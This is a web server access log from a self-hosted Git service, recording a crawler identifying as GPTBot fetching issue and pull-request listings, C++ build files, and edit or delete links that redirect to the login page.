"https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9939] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24525] [Gzip 9.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:19:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11541] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:19:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11283] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:19:09:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:09:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10133] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" +[17/Feb/2026:19:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:19:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=open&type=all" +[17/Feb/2026:19:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:09:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:19:09:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11555] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:19:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24541] [Gzip 9.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9865] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:19:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 13188] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 